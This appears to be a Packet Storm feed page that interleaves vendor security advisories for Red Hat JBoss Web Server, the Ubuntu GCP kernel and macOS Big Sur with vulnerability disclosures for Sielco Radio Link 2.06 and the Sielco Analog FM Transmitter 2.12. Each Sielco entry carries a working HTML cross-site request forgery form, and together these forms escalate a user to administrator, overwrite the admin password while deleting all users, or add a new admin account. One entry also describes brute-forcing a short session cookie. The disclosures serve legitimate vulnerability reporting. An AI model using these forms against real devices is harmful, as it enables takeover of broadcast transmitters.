Sielco Radio Link version 2.06 suffers from a remote privilege escalation vulnerability.

<html>  <body>    <form action="http://radiolink/protect/users_rx.htm" method="POST">      <input type="hidden" name="pwd0" value="" />      <input type="hidden" name="pwd0bis" value="" />      <input type="hidden" name="user1" value="testingus" />      <input type="hidden" name="pwd1" value="" />      <input type="hidden" name="pwd1bis" value="" />      <input type="hidden" name="auth1" value="2" />      <input type="hidden" name="user2" value="" />      <input type="hidden" name="pwd2" value="" />      <input type="hidden" name="pwd2bis" value="" />      <input type="hidden" name="auth2" value="0" />      <input type="hidden" name="user3" value="" />      <input type="hidden" name="pwd3" value="" />      <input type="hidden" name="pwd3bis" value="" />      <input type="hidden" name="auth3" value="0" />      <input type="submit" value="Escalate" />    </form>  </body></html>

Sielco Radio Link 2.06 Remote Privilege Escalation

Red Hat Security Advisory 2023-1663-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector, the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release of Red Hat JBoss Web Server 5.7.2 serves as a replacement for Red Hat JBoss Web Server 5.7.1. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: Red Hat JBoss Web Server 5.7.2 release and security update  
Advisory ID:       RHSA-2023:1663-01  
Product:           Red Hat JBoss Web Server  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1663  
Issue date:        2023-04-12  
CVE Names:         CVE-2022-42252 CVE-2022-45143   
=====================================================================

1. Summary:

An update is now available for Red Hat JBoss Web Server 5.7.2 on Red Hat  
Enterprise Linux versions 7, 8, and 9.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Web Server 5.7 for RHEL 7 Server - noarch  
Red Hat JBoss Web Server 5.7 for RHEL 8 - noarch  
Red Hat JBoss Web Server 5.7 for RHEL 9 - noarch

3. Description:

Red Hat JBoss Web Server is a fully integrated and certified set of  
components for hosting Java web applications. It is comprised of the Apache  
Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the  
PicketLink Vault extension for Apache Tomcat, and the Tomcat Native  
library.

This release of Red Hat JBoss Web Server 5.7.2 serves as a replacement for  
Red Hat JBoss Web Server 5.7.1. This release includes bug fixes,  
enhancements and component upgrades, which are documented in the Release  
Notes, linked to in the References.

Security Fix(es):

* jws5-tomcat: tomcat: request smuggling (CVE-2022-42252)

* jws5-tomcat: tomcat: JsonErrorReportValve injection (CVE-2022-45143)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2141329 - CVE-2022-42252 tomcat: request smuggling  
2158695 - CVE-2022-45143 tomcat: JsonErrorReportValve injection

6. Package List:

Red Hat JBoss Web Server 5.7 for RHEL 7 Server:

Source:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el7jws.src.rpm

noarch:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-admin-webapps-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-docs-webapp-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-el-3.0-api-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-java-jdk11-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-java-jdk8-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-javadoc-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-jsp-2.3-api-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-lib-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-selinux-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-servlet-4.0-api-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm  
jws5-tomcat-webapps-9.0.62-13.redhat_00011.1.el7jws.noarch.rpm

Red Hat JBoss Web Server 5.7 for RHEL 8:

Source:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el8jws.src.rpm

noarch:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-admin-webapps-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-docs-webapp-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-el-3.0-api-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-javadoc-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-jsp-2.3-api-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-lib-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-selinux-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-servlet-4.0-api-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm  
jws5-tomcat-webapps-9.0.62-13.redhat_00011.1.el8jws.noarch.rpm

Red Hat JBoss Web Server 5.7 for RHEL 9:

Source:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el9jws.src.rpm

noarch:  
jws5-tomcat-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-admin-webapps-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-docs-webapp-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-el-3.0-api-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-javadoc-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-jsp-2.3-api-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-lib-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-selinux-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-servlet-4.0-api-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm  
jws5-tomcat-webapps-9.0.62-13.redhat_00011.1.el9jws.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42252  
https://access.redhat.com/security/cve/CVE-2022-45143  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDbdDNzjgjWX9erEAQgKzhAAnJkQUZeQ47zUMX/RBtw59MhHkHuwwZR6  
333IQfka9h6txKZ9YDNMrO8+N+QBFiy7z+Z0afLj56kOrVSS7/o72d5A5iovTwki  
8Y5rrFbzqIKCoqK696QqA0UAIGeWN4Dk8CRoraAHuW+tB/4u1cEfnZuNB4mfQ7Uh  
nk2lPpwzbwW1J6mtPqjlE3wQEP3/7gtLFlbKiK13jzEtjGPHWs9taxescAzfS0hN  
tQT6r6ek5EAyS3aBeO/GWjzrrcLJS6lLXkEXOypNEzNH3U8fthlSdtJRCKo7Blqm  
oRwcpLKV4IT/5rF5SA0Kb+M9PBdYlJnSnaDFQAcAU9v5GoS6E4V/EK14UJ4Tw4ii  
sMu7/zfGezspNFqok0UftP97vhLsdA5rKZNXgeKSmfQT2B4R0AOef8dWyAEcrUyK  
3bmQcoP/YOQ8nZb+2vA+rLfwML7fqFio2MbL72s4Gj3Jwcxyt+aTKZcHIV6yx8VX  
mH9pjWpgIvpnDvWhM4FiTWe2IqQ5qWdsVK2RbcKX3UMkRZvvkyHWzPeVM1aTWfq6  
lL29LKhLESvqbLjFG/r6rnjrPuuChetr5qT0UQFp93bSez37jncTWuwcgCrf84KN  
u+7dxIK5ao8O0ZvIobivJTeu4GkNcMQEoq5bAdeGGCOGRx3rQwrX3wof7tpEm7Tc  
m2JImjNFncU=  
=3rkd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1663-01

Sielco Radio Link version 2.06 suffers from an improper access control vulnerability that allows for a lower privileged user to change the administrator's password.

<html>  <body>    <form action="http://radiolink/protect/users_rx.htm" method="POST">      <input type="hidden" name="pwd0" value="Ch4nged12" />            <input type="hidden" name="pwd0bis" value="Ch4nged12" />         <input type="hidden" name="user1" value="" />                    <input type="hidden" name="pwd1" value="" />                     <input type="hidden" name="pwd1bis" value="" />                  <input type="hidden" name="auth1" value="0" />                   <input type="hidden" name="user2" value="" />                    <input type="hidden" name="pwd2" value="" />                     <input type="hidden" name="pwd2bis" value="" />                  <input type="hidden" name="auth2" value="0" />                   <input type="hidden" name="user3" value="" />                    <input type="hidden" name="pwd3" value="" />                     <input type="hidden" name="pwd3bis" value="" />                  <input type="hidden" name="auth3" value="0" />                   <input type="submit" value="Modify admin pwd, delete all users" />    </form>  </body></html>

Sielco Radio Link 2.06 Improper Access Control 

Sielco Radio Link version 2.06 suffers from a cross site request forgery vulnerability.

CSRF Add Admin:  
---------------

<html>  
  <body>  
    <form action="http://radiolink/protect/users_rx.htm" method="POST">  
      <input type="hidden" name="pwd0" value="" />  
      <input type="hidden" name="pwd0bis" value="" />  
      <input type="hidden" name="user1" value="Reader" />  
      <input type="hidden" name="pwd1" value="123456" />  
      <input type="hidden" name="pwd1bis" value="123456" />  
      <input type="hidden" name="auth1" value="2" />  
      <input type="hidden" name="user2" value="" />  
      <input type="hidden" name="pwd2" value="" />  
      <input type="hidden" name="pwd2bis" value="" />  
      <input type="hidden" name="auth2" value="0" />  
      <input type="hidden" name="user3" value="" />  
      <input type="hidden" name="pwd3" value="" />  
      <input type="hidden" name="pwd3bis" value="" />  
      <input type="hidden" name="auth3" value="0" />  
      <input type="submit" value="Adminize Me!" />  
    </form>  
  </body>  
</html>

Sielco Radio Link 2.06 Cross Site Request Forgery

Ubuntu Security Notice 6009-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6009-1  
April 11, 2023

linux-gcp vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   linux-image-4.15.0-1147-gcp     4.15.0-1147.163~16.04.1  
   linux-image-gcp                 4.15.0.1147.137  
   linux-image-gke                 4.15.0.1147.137

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6009-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-28328

Ubuntu Security Notice USN-6009-1

Sielco Radio Link version 2.06 suffers from a cookie brute forcing vulnerability that can allow for session hijacking.

    Sielco Radio Link 2.06 'id' Cookie Brute Force Session HijackingVendor: Sielco S.r.lProduct web page: https://www.sielco.orgAffected version: 2.06 (RTX19)                  2.05 (RTX19)                  2.00 (EXC19)                  1.60 (RTX19)                  1.59 (RTX19)                  1.55 (EXC19)Summary: Sielco develops and produces radio links for alltransmission and reception needs, thanks to innovative unitsand excellent performances, accompanied by a high reliabilityand low consumption.Desc: The Cookie session ID 'id' is of an insufficient length andcan be exploited by brute force, which may allow a remote attackerto obtain a valid session, bypass authentication and manipulatethe transmitter.Tested on: lwIP/2.1.1           Web/2.9.3Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5762Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5762.php26.01.2023--# Session values (len=5)Cookie: id=42331Cookie: id=28903Cookie: id=+5581Cookie: id=+9002......

Sielco Radio Link 2.06 Cookie Brute Force

Red Hat Security Advisory 2023-1664-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector, the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release of Red Hat JBoss Web Server 5.7.2 serves as a replacement for Red Hat JBoss Web Server 5.7.1. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Low: Red Hat JBoss Web Server 5.7.2 release and security updateAdvisory ID:       RHSA-2023:1664-01Product:           Red Hat JBoss Web ServerAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:1664Issue date:        2023-04-12CVE Names:         CVE-2022-42252 CVE-2022-45143 =====================================================================1. Summary:Red Hat JBoss Web Server 5.7.2 zip release is now available for Red HatEnterprise Linux 7, Red Hat Enterprise Linux 8, Red Hat Enterprise Linux 9,and Microsoft Windows.Red Hat Product Security has rated this release as having a security impactof Low. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat JBoss Web Server is a fully integrated and certified set ofcomponents for hosting Java web applications. It is comprised of the ApacheTomcat Servlet container, JBoss HTTP Connector (mod_cluster), thePicketLink Vault extension for Apache Tomcat, and the Tomcat Nativelibrary.This release of Red Hat JBoss Web Server 5.7.2 serves as a replacement forRed Hat JBoss Web Server 5.7.1. This release includes bug fixes,enhancements and component upgrades, which are documented in the ReleaseNotes, linked to in the References.Security Fix(es):* jws5-tomcat: tomcat: request smuggling (CVE-2022-42252)* jws5-tomcat: tomcat: JsonErrorReportValve injection (CVE-2022-45143)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying this update, make sure all previously released erratarelevant to your system have been applied.For details on how to apply this update, refer to:https://access.redhat.com/articles/112584. Bugs fixed (https://bugzilla.redhat.com/):2141329 - CVE-2022-42252 tomcat: request smuggling2158695 - CVE-2022-45143 tomcat: JsonErrorReportValve injection5. References:https://access.redhat.com/security/cve/CVE-2022-42252https://access.redhat.com/security/cve/CVE-2022-45143https://access.redhat.com/security/updates/classification/#lowhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=5.76. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBZDbdDNzjgjWX9erEAQizOg//bfEAxYNQHL1lTYOyA2mCxtEgmjnAZ8DwY1+gq14nKHRLuWL5x01ZEBh1slYWGGf2k9SlXwIAhIpLgtUJInejvUe+8fliPM3Gb7PlVu2SullrfUzMsf/lUYgo1kYNw8dLC0OsAdCnac3n+Uv5S7YnFHWek563dbTqJZIQ6OsXawXEb7NxSZSgstQIjHUo+qkrl5YjYgRV3JOaUB8ZIeRN7Pq9I+z/ut+dOOfH5TaRLoc1EATVoVARXF+Ube4+OfaikQf2xyScCRirL29jwyzIhKfucu/9cU7AbEweNCi7lLkRYcDNfdEgaDDcMXq9iofAL4xtuGFw4UgIxXOKA7HRgbW/WLZaGSBSwXh1fFT9OB8bEka2MNMteTNa4GP0Rs0P/3vIdb1Pz/Y+CU0gcNYUkezGg7IGnhHSkh4ZiNPWO8b5OFJ0exQJ5VeMTz3QhNtugkj05TCUkhbzAplcEFOF1sThYwpSpqyCeMH5n0oRYyApmOV/ZUYvfBK2WZaMo1mBkqoct5KhMpUVc29of8/i42uCb2dgK1QFhS7sdzVwZy9ffMBJqKOD1pbRjwvSzkuMk2W/MwWpDjYnbkw4x8mVXDksichvuc58CBGKFAM6xmkvyVXBTlEkcCyUl0jqTR7DOyRPmtYqamxaifhWmAgybj45RjwF/L0SRZHrSmviVH4==fYDn-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1664-01

Sielco Analog FM Transmitter version 2.12 suffers from a remote privilege escalation vulnerability.

<html>  <body>    <form action="http://transmitter/protect/users.htm" method="POST">      <input type="hidden" name="pwd0" value="" />      <input type="hidden" name="pwd0bis" value="" />      <input type="hidden" name="user1" value="" />      <input type="hidden" name="pwd1" value="" />      <input type="hidden" name="pwd1bis" value="" />      <input type="hidden" name="auth1" value="" />      <input type="hidden" name="user2" value="test" />      <input type="hidden" name="pwd2" value="" />      <input type="hidden" name="pwd2bis" value="" />      <input type="hidden" name="auth2" value="2" />      <input type="hidden" name="user3" value="" />      <input type="hidden" name="pwd3" value="" />      <input type="hidden" name="pwd3bis" value="" />      <input type="hidden" name="auth3" value="" />      <input type="submit" value="Escalate" />    </form>  </body></html>

Sielco Analog FM Transmitter 2.12 Remote Privilege Escalation

Sielco Analog FM Transmitter version 2.12 suffers from an improper access control vulnerability that allows for a lower privileged user to change the administrator's password.

<html>  <body>    <form action="http://transmitter/protect/users.htm" method="POST">      <input type="hidden" name="pwd0" value="PWDCHANGED" />           <input type="hidden" name="pwd0bis" value="PWDCHANGED" />        <input type="hidden" name="user1" value="" />                    <input type="hidden" name="pwd1" value="" />                     <input type="hidden" name="pwd1bis" value="" />                  <input type="hidden" name="auth1" value="0" />                   <input type="hidden" name="user2" value="" />                    <input type="hidden" name="pwd2" value="" />                     <input type="hidden" name="pwd2bis" value="" />                  <input type="hidden" name="auth2" value="0" />                   <input type="hidden" name="user3" value="" />                    <input type="hidden" name="pwd3" value="" />                     <input type="hidden" name="pwd3bis" value="" />                  <input type="hidden" name="auth3" value="0" />                   <input type="submit" value="Modify admin pwd, delete all users" />    </form>  </body></html>

Sielco Analog FM Transmitter 2.12 Improper Access Control

Apple Security Advisory 2023-04-10-3 - macOS Big Sur 11.7.6 addresses code execution and out of bounds write vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-04-10-3 macOS Big Sur 11.7.6macOS Big Sur 11.7.6 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213725.IOSurfaceAcceleratorAvailable for: macOS Big SurImpact: An app may be able to execute arbitrary code with kernelprivileges. Apple is aware of a report that this issue may have beenactively exploited.Description: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2023-28206: Clément Lecigne of Google's Threat Analysis Group andDonncha Ó Cearbhaill of Amnesty International’s Security LabmacOS Big Sur 11.7.6 may be obtained from the Mac App Store orApple's Software Downloads web site:https://support.apple.com/downloads/All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQ0VJIACgkQ4RjMIDkeNxkW2Q//bj0ZmcXsCzpQmhCc5hZ+P4cnesy9Kc4DRLofsYBtPVlR450wIjxiGqlUkpbLBWpBXaXn4EeBoqxxXB9FKXANvZVkdS+xpTLdHpdPnRMntJf3S4WiYyDr/G3coHVtHbNMbj/K/MbsRGBefVtGAueLpwwHFN5GsyvuMrp5xEl9wgQ3aMfi+x8hHXuFzxHIHyNf6OU5cBSf6R80FQcV55eOjPe9gX1B59n4ffZtaao3QqT+z++wA64eyVCVk9hSWXYsMKBNgcoyh108DHb6aYfr0G6SvcvzX2zR2zJtL0JFDNckHx/nvAws/Sd5O39oHzvS46gNcYZIHujHbemh/DsFJjgKbOd4O9oLyJeAcVjv0c5i61Qa+odERpvX2bJR8xWLlDGYIV5XmGYzxL8lksDim9hD2IOGf6P7ReARUcpahe9jaAIoj+BoFkKUMvr8iORx0752+3h+dMej1nu/1RhjmeWYawbUsH+yECu0L2GkQc0I9gFg0Dq21OFlHEfB46D+XRTWYWkM6l9KPMNcH1PX74d86ZkuqqMzlKmsRdJz0ESepIj6RzQ3Zy5SvZ63C78RJvWGPeg/8rQFIBQE9WktUoPz5+6bU/E1nq8ExbrTXxJKvt/VseIwBTi08UfQ2oYnyyAirIkTRi9PH5pviXBu9r/AiBYSj9J88QBzrV8QXHw==Lq+b-----END PGP SIGNATURE-----

Source

Packet Storm